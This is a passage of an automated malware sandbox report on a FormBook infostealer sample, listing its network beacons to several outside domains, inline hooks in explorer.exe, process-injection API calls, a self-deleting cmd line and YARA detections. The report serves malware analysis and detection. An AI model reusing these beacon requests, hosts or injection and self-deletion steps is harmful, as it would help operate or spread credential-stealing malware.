Oct 24, 2023 08:29:51.155838966 CEST	121	IN	Data Raw: 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c Data Ascii: index, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cd
Oct 24, 2023 08:29:51.155880928 CEST	122	IN	Data Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two">
Oct 24, 2023 08:29:51.155919075 CEST	123	IN	Data Raw: 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d Data Ascii: order-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">81b02af23c27061b</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span
Oct 24, 2023 08:29:51.155956984 CEST	124	IN	Data Raw: 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 Data Ascii: </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.11	49721	103.224.212.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:30:33.279150009 CEST	160	OUT	GET /rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs HTTP/1.1 Host: www.nightoracle.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:30:33.469585896 CEST	161	IN	HTTP/1.1 302 Found date: Tue, 24 Oct 2023 06:30:33 GMT server: Apache set-cookie: __tad=1698129033.1062467; expires=Fri, 21-Oct-2033 06:30:33 GMT; Max-Age=315360000 location: http://ww25.nightoracle.com/rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs&subid1=20231024-1730-3357-9cb2-2a616f5fefdf content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.11	49722	104.21.69.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:30:53.443054914 CEST	162	OUT	GET /rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs HTTP/1.1 Host: www.mtauratarnt.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.11	49723	104.247.82.51	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:31:16.668472052 CEST	163	OUT	GET /rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs HTTP/1.1 Host: www.robertjamesfineclothing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:31:16.799953938 CEST	163	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 24 Oct 2023 06:31:16 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE2
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE2
GetMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE2
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE2

Target ID:	0
Start time:	08:27:09
Start date:	24/10/2023
Path:	C:\Users\user\Desktop\GCeHcfCef8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\GCeHcfCef8.exe
Imagebase:	0xd30000
File size:	832'512 bytes
MD5 hash:	841031A37159398B8EEBCA7BB7EFF56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:27:10
Start date:	24/10/2023
Path:	C:\Users\user\Desktop\GCeHcfCef8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\GCeHcfCef8.exe
Imagebase:	0xc90000
File size:	832'512 bytes
MD5 hash:	841031A37159398B8EEBCA7BB7EFF56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:27:10
Start date:	24/10/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff611de0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	08:27:12
Start date:	24/10/2023
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0x450000
File size:	36'352 bytes
MD5 hash:	DEC326E5B4D23503EA5176878DDDB683
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:27:15
Start date:	24/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\GCeHcfCef8.exe"
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:27:15
Start date:	24/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	198
Total number of Limit Nodes:	14

Executed Functions

Function 0569DC88 Relevance: 7.0, Strings: 5, Instructions: 721COMMON

Download Yara Rule

Strings

,cq, xrefs: 0569E29F
(o_q, xrefs: 0569E511
(o_q, xrefs: 0569E51B
,cq, xrefs: 0569E2AF
Hcq, xrefs: 0569E588

Memory Dump Source

Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: (o_q$(o_q$,cq$,cq$Hcq
API String ID: 0-4110691418
Opcode ID: 6f91ea145f3eb6ae9eb616c5529ab691144b21fbcf0382c1a076dd075ce1e590
Instruction ID: 879928990db9cde1e09c9bf15566b61ef93a05934908ca947d5a2405346110ec
Opcode Fuzzy Hash: 6f91ea145f3eb6ae9eb616c5529ab691144b21fbcf0382c1a076dd075ce1e590
Instruction Fuzzy Hash: E0525474B00115DFCF18DF69C894A6EBBBABF84710B158169E816DB764DB32EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05696A48 Relevance: .9, Instructions: 889COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a40394e4996e4ba73e8af55697ec641d79f132c632f4af4dc1e6924f629198
Instruction ID: 334989a01c63f71a559d8be43189770850d7da749007421868fbb580e00ad43d
Opcode Fuzzy Hash: f8a40394e4996e4ba73e8af55697ec641d79f132c632f4af4dc1e6924f629198
Instruction Fuzzy Hash: 35A2B638A11219CFCB25DF64C994AD9B7B2FF89301F1181E9E509AB365DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05696A38 Relevance: .8, Instructions: 826COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b29cd7652e912eb77b20a914171f9364b061b6849196457ec64d4ceb0eec96
Instruction ID: f94d92ca3b6f59c3390357475251d901800a57233da0a7e286d91bb07565261b
Opcode Fuzzy Hash: 97b29cd7652e912eb77b20a914171f9364b061b6849196457ec64d4ceb0eec96
Instruction Fuzzy Hash: 0D92D538A11619CFCB25DF64C898AD9B7B2FF89301F1141E9E509AB365DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0BF35598 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07fc821e67ff36eaaf788f7ed3d5cf51decb834438e857a04432d20829becf59
Instruction ID: 5812f1b207db5ed987101b7f6dc79b50b015c758e1cdbe6e7fb5cbac9b9ce532
Opcode Fuzzy Hash: 07fc821e67ff36eaaf788f7ed3d5cf51decb834438e857a04432d20829becf59
Instruction Fuzzy Hash: 8DC13A72D19219DFCB18CFA6D98059EFBB6FF99700F10D42AD026AB264D7349946CF04

Uniqueness

Uniqueness Score: -1.00%

Function 0BF35588 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24956f0d241739a90d69e9054d45e9819a6436454cba233dd64f113faa9a8474
Instruction ID: fe81fd9eec68b6ccad5009beb1476a0a11f9163eea7fdbbe404478e958024b1a
Opcode Fuzzy Hash: 24956f0d241739a90d69e9054d45e9819a6436454cba233dd64f113faa9a8474
Instruction Fuzzy Hash: 82C13A72E19219DFCB18CFA6D98059EFBF6FF99700F10942AD026AB264D7349946CF04

Uniqueness

Uniqueness Score: -1.00%

Function 0BF35A28 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e905b1a96d5d3a238bb506365f562f4e067169c8534fe579a35e8e39ac7794d
Instruction ID: 2a1d644bc7528b51ec721c06119e0ccb675553f79715edc4071ab348b76636aa
Opcode Fuzzy Hash: 8e905b1a96d5d3a238bb506365f562f4e067169c8534fe579a35e8e39ac7794d
Instruction Fuzzy Hash: 8E51F5B5E051199BCB04DFAAD5809AEFBF2FF98300F24C529D419A7355DB34A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0BF35A17 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890f796c0a77b90271c990d748408d957d5b47793e4963e00b80467c168f288f
Instruction ID: e5c9c89b03c613207f868f8bac3aac34b553f92d539bd6cd72270384705c3859
Opcode Fuzzy Hash: 890f796c0a77b90271c990d748408d957d5b47793e4963e00b80467c168f288f
Instruction Fuzzy Hash: 0D41E6B5E016198FDB08DFAAD98069EFBF2FF88300F14C46AD819A7354DB349945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0BF3BDA8 Relevance: 1.8, APIs: 1, Instructions: 260
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0BF3C086

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 098c5927100b32e9b6c8097f987ba07f11337e16ac1cafb172762acbb2ea56ea
Instruction ID: c5e2556b94f59b7ade3004a09dc647937a474736c79d7bf20eb6b83618be815c
Opcode Fuzzy Hash: 098c5927100b32e9b6c8097f987ba07f11337e16ac1cafb172762acbb2ea56ea
Instruction Fuzzy Hash: 1691AC71A041258BCB05CB6DC8A0A7EFBB2EFC9710B14C61AE4699B35AC775EC41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0BF3C41D Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0BF3C65E

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e6b9bbcb271a8f93188084fd8b08d0c7fca087aee399c687b1c1b870888e0285
Instruction ID: f592274af8dc368e332d6fbe57ce6a61f1fa343b2bc1407f27dcb6c2b12da617
Opcode Fuzzy Hash: e6b9bbcb271a8f93188084fd8b08d0c7fca087aee399c687b1c1b870888e0285
Instruction Fuzzy Hash: 9BA13572D00319DFDB20CFA8C841BEEBBB2EB48714F1485AAD849B7240DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0BF3C428 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0BF3C65E

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c236008e741be570a851082fb526fa9a47c8ee4be99195e0304a4d73a7ca754
Instruction ID: f04363cd3cc845dfc517507f11e32a9fe0924a7f1672a14478307501c802e08b
Opcode Fuzzy Hash: 1c236008e741be570a851082fb526fa9a47c8ee4be99195e0304a4d73a7ca754
Instruction Fuzzy Hash: 26912672D003199FDB20CF69C841BAEBBB2EB48714F1485AAD849B7240DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 018DAD48 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 018DAF9E

Memory Dump Source

Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 16675ef7dd62b63514163bb84c849ac17db8b77fed81a237d24784d6d3cfa610
Instruction ID: 2b87463e634c3d3bd5bedfcb76793820c52772bf98e13c15ca911b62243686c9
Opcode Fuzzy Hash: 16675ef7dd62b63514163bb84c849ac17db8b77fed81a237d24784d6d3cfa610
Instruction Fuzzy Hash: 08710370A00B058FDB28DF2AD44475ABBF1BF88314F208A2DE44AD7B50DB75E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018D44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018D59C9

Memory Dump Source

Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 318db04b3dd4012fa6463eb540f5ad003783b24c22dc0e5884eec9ac48b8dcad
Instruction ID: 22be891736038dce6414c58d1123db6c27d9db194c3cda284d93687955e91e68
Opcode Fuzzy Hash: 318db04b3dd4012fa6463eb540f5ad003783b24c22dc0e5884eec9ac48b8dcad
Instruction Fuzzy Hash: 2A41B3B0C0071DCBDB24DFA9C984B9EBBF5BF49304F20806AD409AB255DB755945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 018D590D Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018D59C9

Memory Dump Source

Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ae7f6d940e271a346c6c11ceaa4a798e05d2a40a4481f6b5e9c196dbfb8c7dea
Instruction ID: 622d03738a26866c231693d2e4c1569358f0c8ebfa1109969c178a0f21a1da4a
Opcode Fuzzy Hash: ae7f6d940e271a346c6c11ceaa4a798e05d2a40a4481f6b5e9c196dbfb8c7dea
Instruction Fuzzy Hash: 8241AFB0C00729CFDB24DFA9C984BDEBBB5BF49304F60806AD409AB255DB75598ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 05694040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05694101

Memory Dump Source

Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 570ebab3fa9499a29f5c8af64c21ceacfe002a96a5ef46c3c73fa07458fe65e4
Instruction ID: 0e87afc3b6f9c3f46cef65adee610299e6dae8f8578cf837fa063d9c8048ff33
Opcode Fuzzy Hash: 570ebab3fa9499a29f5c8af64c21ceacfe002a96a5ef46c3c73fa07458fe65e4
Instruction Fuzzy Hash: 744109B4900309DFCB18CF99C848AAAFBF9FB98314F25C459D519A7321D775A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0BF3C198 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0BF3C230

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ae2f15e8a1f0d93279f16334c14ec0407ad498ac2bbb0f6a5630dc1eddb0fcde
Instruction ID: 2192d93a7631d487345607406f1198d12a8310046f94c75d01428497ab388267
Opcode Fuzzy Hash: ae2f15e8a1f0d93279f16334c14ec0407ad498ac2bbb0f6a5630dc1eddb0fcde
Instruction Fuzzy Hash: 2B211571D003599FCB10DFA9C885BEEBBF1FF48310F10842AE919A7240C779A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0BF3C1A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0BF3C230

Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 473e861d33b6f705db147246da498d30a4584fcce9823e6a54e92c8cfba1a65d
Instruction ID: 2483c05b157e5b3a426ceb36d15dfc4f5fc767292ccfd5e2045fc5c938024187
Opcode Fuzzy Hash: 473e861d33b6f705db147246da498d30a4584fcce9823e6a54e92c8cfba1a65d
Instruction Fuzzy Hash: E52125B2D003499FCB10DFA9C885BDEBBF5FF48310F10842AE919A7240C779A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 018DD21C Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018DD5F6,?,?,?,?,?), ref: 018DD6B7

Memory Dump Source

Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c2fb656aabf5cb0f39c8e6bb71ea55bc0954e0882e0d001dfdb1c414c39cb6fa
Instruction ID: ff540ffb5e5ae2038f2e4240e19fcd35102e58b7d15d355bf35af60f03f8111e
Opcode Fuzzy Hash: c2fb656aabf5cb0f39c8e6bb71ea55bc0954e0882e0d001dfdb1c414c39cb6fa
